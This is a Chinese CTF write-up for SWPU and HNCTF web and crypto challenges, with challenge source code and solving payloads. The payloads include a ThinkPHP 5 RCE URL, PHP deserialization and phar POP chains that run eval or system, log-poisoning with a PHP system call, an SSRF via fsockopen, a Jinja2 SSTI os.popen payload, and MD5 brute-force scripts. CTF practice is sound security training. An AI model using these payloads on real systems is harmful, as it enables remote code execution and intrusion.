<1> SWPU
(1) webdog1__start
在start.php 界面抓个包,发包
得到:F1l1l1l1l1lag.php
<?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_GET['get'])){
$get=$_GET['get'];
if(!strstr($get," ")){
$get = str_ireplace("flag", " ", $get);
if (strlen($get)>18){
die("This is too long.");
}
else{
eval($get);
}
}else {
die("nonono");
}
}
(2) ez_ez_php(revenge)
ThinkPHP V5 rce 漏洞
在网上可以找到现成的payload
Thinkphp5 RCE漏洞_Sentiment.的博客-CSDN博客_tp5 漏洞
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
替换whoami命令为我们要执行的命令即可
(3) 1z_unserialize
反序列化构造 assert(eval($_POST[1]));
cat /flag即可
(4) ez_1zpop
<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}
class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}
function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}
class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}
if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}
exploit.php
<?php
error_reporting(0);
class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
}
class fin
{
public $a;
public $title;
}
$NSS = new lt();
$NSS -> impo = new fin();
$NSS -> md51 = 'QNKCDZO';
$NSS -> md52 = 's878926199a';
$NSS->impo -> a = 'assert';
$NSS->impo -> title = 'eval($_POST[1])';
echo serialize($NSS);
之后把属性改大一位,绕过__wakeup()函数
(5) numgame
查看js源码发现了NsScTf.php
<?php
error_reporting(0);
//hint: 与get相似的另一种请求协议是什么呢
include("flag.php");
class nss{
static function ctf(){
include("./hint2.php");
}
}
if(isset($_GET['p'])){
if (preg_match("/n|c/m",$_GET['p'], $matches))
die("no");
call_user_func($_GET['p']);
}else{
highlight_file(__FILE__);
}
preg_match匹配到 n或者c 就die("No"),但是它是/m 多行文本 不是/i ,所以可以大小写绕过
至于call_user_func()怎么利用
我们可以传参:?p=Nss::Ctf (静态函数调用)
回显:
改Nss为Nss2 最终payload:?p=Nss2::Ctf
查看源码,得到flag
(6) Crypto 爆破MD5
贴上爆破脚本
import string
import hashlib
alist = string.printable
for i in alist:
for j in alist:
for k in alist:
for l in alist:
data = 'Boom_MD5' + i + j + k + l
s = hashlib.md5(data.encode('utf-8')).hexdigest()
if s[:27] == "0618ac93d4631df725bceea74d0":
print("Find it:", data, ":", s)
exit()
<2> HNCTF
[Week1]Challenge__rce
if (isset($_POST['rce'])) {
$rce = $_POST['rce'];
if (strlen($rce) <= 120) {
if (is_string($rce)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
eval($rce);
} else {
echo("Are you hack me?");
}
} else {
echo "I want string!";
}
} else {
echo "too long!";
}
}
利用构造数组获取字母 然后自增构造chr函数
$___.=[];$_=$___[3];$_++;$_++;$__=$_++;$_++;$_++;$_++;$__.=++$_.$___[2];$_=_.$__(71).$__(69).$__(84);($$_{1})($$_{2});
[WEEK2]easy_include
日志注入, include /var/log/nginx/access_log
然后往 User-Agent里写入命令即可 <?php system('ls'); ?>
[WEEK2]Canyource
<?php
highlight_file(__FILE__);
if(isset($_GET['code'])&&!preg_match('/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['code'])){
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);}
else
die('nonono');}
else
echo('please input code');
highlight_file() show_source() 都被禁了 利用 echo(readfile())来读取
payload: ?code=echo(readfile(next(array_reverse(scandir(pos(localeconv()))))));
[WEEK2] ez_ssrf
<?php
highlight_file(__FILE__);
error_reporting(0);
$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];
$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
die();
}
else {
fwrite($fp,$data);
while(!feof($data))
{
echo fgets($fp,128);
}
fclose($fp);
}
**fsockopen函数触发ssrf **
使用fsockopen函数实现获取用户制定url的数据(文件或者html)。这个函数会使用socket跟服务器建立tcp连接,传输原始数据。fsockopen本身就是打开一个网络连接或者Unix套接字连接。 如下:
<?php $host=$_GET['url']; $fp = fsockopen("$host", 80, $errno, $errstr, 30); if (!$fp) { echo "$errstr ($errno)<br />\n"; } else { $out = "GET / HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (!feof($fp)) { echo fgets($fp, 128); } fclose($fp); } ?>
因此构造poc.php:
<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>
得到data,host为127.0.0.1,port为80
传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
[WEEK2] easy_unser(is_file highlight_file对于php伪协议的使用)
<?php
include 'f14g.php';
error_reporting(0);
highlight_file(__FILE__);
class body{
private $want,$todonothing = "i can't get you want,But you can tell me before I wake up and change my mind";
function __wakeup(){
$About_me = "When the object is unserialized,I will be called";
$but = "I can CHANGE you";
$this-> want = $but;
echo "C1ybaby!";
}
function __destruct(){
$About_me = "I'm the final function,when the object is destroyed,I will be called";
echo "So,let me see if you can get what you want\n";
if($this->todonothing === $this->want)
die("鲍勃,别傻愣着!\n");
if($this->want == "I can CHANGE you")
die("You are not you....");
if($this->want == "f14g.php" OR is_file($this->want)){
die("You want my heart?No way!\n");
}else{
echo "You got it!";
highlight_file($this->want);
}
}
}
构造序列化满足 !is_file($this->want) 且 可以 highlight_file($this-want);
考点:php伪协议绕过is_file highlight_file对于php伪协议的使用
is_file判断给定文件名是否为一个正常的文件,返回值为布尔类型。is_file会认为php伪协议不是文件。但highlight_file认为伪协议可以是文件。 所以我们可以用php伪协议来绕过显示flag文件
<?php
class body{
private $want= "php://filter/resource=f14g.php";
private $todonothing = "1";
}
$a = new body();
echo urlencode(serialize($a));
[WEEK2]ez_SSTI
?name={{7*'7'}} 检测出存在 SSTI 无过滤
?name={{config.class.init.globals['os'].popen('ls').read() }} 发现flag
?name={{config.class.init.globals['os'].popen('cat flag').read() }}
[WEEK3]ez_phar
upload.php 上传我们构造好的phar文件
<?php
class Flag
{
public $code="system('cat /ffflllaaaggg');";
}
$test = new Flag();
$phar = new Phar("aa.phar"); //文件名
$phar->startBuffering();
/* 设置stub,必须要以__HALT_COMPILER(); ?>结尾 */
$phar->setStub("<?php __HALT_COMPILER(); ?>");
/* 设置自定义的metadata,序列化存储,解析时会被反序列化 */
$phar->setMetaData($test);
/* 添加要压缩的文件 */
$phar->addFromString("test1.txt","test1");
//签名自动计算
$phar->stopBuffering();
那就 压缩成zip 改后缀为png绕过
执行 system('ls /'); 发现flag文件
再执行 system('cat //ffflllaaaggg'); 即可
[Week3]fun_php
这道题看着内容多,其实审计一下也就是一块一块的,静下心分区域看一看
$getUserID = @$_GET['user'];
$getpass = (int)@$_GET['pass'];
$getmySaid = @$_GET['mySaid'];
$getmyHeart = @$_GET['myHeart'];
if(is_string($getUserID))
$user = $user + $getUserID; //u5er_D0_n0t_b3g1n_with_4_numb3r
if($user == 114514 && $getpass == $pass){
if (!ctype_alpha($getmySaid))
die();
if (!is_numeric($getmyHeart))
die();
if(md5($getmySaid) != md5($getmyHeart)){
die("Cheater!");
}
else
$week_1 = true;
}
要求
$user == 114514 && $getpass == $pass 则传值 user=114514 pass不传他就默认==
$getmySaid为字母 $getmyHeart为数字,并且他俩md5() == 则传值mySaid=QNKCDZO&myHeart=240610708
$data = @$_POST['data'];
if(is_array($data)){
for($i=0;$i<count($data);$i++){
if($data[$i]==="Probius") exit();
$data[$i]=intval($data[$i]);
}
if(array_search("Probius",$data)===0)
$week_2 = true;
else
die("HACK!");
}
最初的循环作用是 遍历数组,如果遇到某一个键值为Probius 就exit()
但是只有 array_search("Probius",$data)===0 才能使 week_2为true
array_search作用:在数组中搜索键值 "red",并返回它的键名
所以我们传入data[0]=probius 绕过。
if($week_1 && $week_2){
if(md5($data)===md5($verify))
// HNCTFWelcome to
if ("hn" == $_GET['hn'] &+!!& " Flag!ctf" == $_GET[LAGctf]) { //HN! flag!! F
if(preg_match("/php|\fl4g|\\$|'|\"/i",$want)Or is_file($want))
die("HACK!");
else{
echo "Fine!you win";
system("cat ./$want");
}
}
else
die("HACK!");
}
由于data是数组,所以我们传入verify也是数组即可===绕过本地调试如下:
unicode隐藏字符,我们复制下来010editor打开
所以get传入hn=hn&%E2%80%AE%E2%81%A6%4C%41%47%E2%81%A9%E2%81%A6%63%74%66=%E2%80%AE%E2%81%A6%20%46%6C%61%67%21%E2%81%A9%E2%81%A6%63%74%66
want传值fl* 通配符绕过 最终Fine!you win 查看源码得到flag
查看源码得到flag
Crypto [WEEK2]md5太残暴了
小明养成了定期修改密码的好习惯,同时,他还是一个CTF爱好者。有一天,他突发奇想,用flag格式来设置密码,为了防止忘记密码,他还把密码进行了md5加密。 为了避免被其他人看到全部密码,他还特意修改了其中部分字符为#。你能猜出他的密码吗? plaintext = flag{#00#_P4ssw0rd_N3v3r_F0rg3t_63####} md5 = ac7f4d52c3924925aa9c8a7a1f522451 PS: 第一个#是大写字母,第二个#是小写字母,其他是数字。
贴上脚本
import string
import hashlib
s1 = string.ascii_uppercase
s2 = string.ascii_lowercase
s3 = []
for i in range(0,10000):
i = str(i)
if len(i)!=4:
s3.append('0'*(4-len(str(i)))+i)
else:
s3.append(i)
for i in s1:
for j in s2:
for k in s3:
s = 'flag{'+i+'00'+j+'_P4ssw0rd_N3v3r_F0rg3t_63'+k+'}'
print(s)
if hashlib.md5(s.encode('utf-8')).hexdigest() == 'ac7f4d52c3924925aa9c8a7a1f522451':
print("Find it: "+s)
exit(0)
版权归原作者 葫芦娃42 所有, 如有侵权,请联系我们删除。